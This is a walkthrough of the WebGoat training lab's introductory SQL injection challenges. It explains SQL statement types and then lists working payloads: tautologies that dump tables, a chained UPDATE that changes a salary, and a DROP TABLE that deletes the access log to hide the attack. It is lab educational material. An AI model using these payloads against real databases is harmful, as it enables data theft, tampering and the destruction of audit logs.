In this walk through, we will be going through the SQL Injection (Intro) vulnerability section from Webgoat Labs. We will be exploring and exploiting basic SQL Injection and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.
Table of Contents
1. What is SQL ?
Structured Query Language (SQL) is a domain specific language used to manage, data, especially in a relational database management system (RDBMS). In this challenge, we will use the below SQL query to check the details of a particular userid in SQL database.
SELECT department FROM employees WHERE userId=96134
2. Data Manipulation Language (DML)
A Data Manipulation Language (DML) is a computer programming language used for adding (inserting), deleting, and modifying (updating) data in a database.
We will use the below UPDATE statement to change the department of the particular userid.
UPDATE employees SET department = 'Sales' WHERE userID = 89762;
3. Data Definition Language (DDL)
In the context of SQL, data definition or data description language is a syntax for creating and modifying database objects such as tables, indices, and users. DDL statements are similar to a computer programming language for defining data structures, especially database schemas. In this challenge, we will use the below ALTER statement to add a column “phone” in the “employees” table.
ALTER TABLE employees ADD phone varchar(20);
4. Data Control Language (DCL)
Data Control Language (or DCL) consists of statements that control security and concurrent access to table data. In this challenge, we will grant rights to the table grant_rights to user unauthorized_user using the below GRANT statement.
GRANT ALL ON grant_rights TO unauthorized_user;
5. String Injection
String injection attacks are when attackers use SQL commands in an attempt to manipulate data stored on your servers, as well as gain access and control over your databases via a vulnerable server or API.
In this challenge, we will used the select button to break the SQL statement and dump all the inside data.
6. Numeric SQL injection
In this challenge, we will exploit Numeric based SQL Injection which are easier to exploit.
We will use the below payload to dump all the data from the table.
0 OR 1=1
7. Compromising confidentiality with String SQL injection
In this challenge, we will use String SQL Injections to compromise the confidentiality of the data. This will be done by dumping all the data from the table.
Smith' OR 1=1
8. Compromising integrity with Query chaining
In this challenge, we will compromise the integrity of the data with Query chaining.
We will use the below payload to first end the SQL statement at the employee name field and then use the UPDATE statement to set the salary to our desired number associated with a particular Authentication TAN.
Smith'; UPDATE employees SET salary=10000000 WHERE auth_tan='3SL99A'; -- -
9. Compromising Availability
In this challenge, we will compromise availability of the data using SQL Injections. This will be done by deleting the SQL logs containing our malicious SQL queries.
We will use the below payload to delete the access_log table.
Smith'; DROP TABLE access_log;
Also Read: Webgoat – Server-Side Request Forgery
Conclusion:
So, we finally completed the Webgoat SQL Injection (Intro) section. Next, we can mitigate these types of attacks by performing input sanitization and using prepared statements or parametrized queries for every SQL query made by the application to the database. On that note, i will take your leave and will meet you in next one with another Webgoat vulnerability writeup, till then “Keep Hacking”.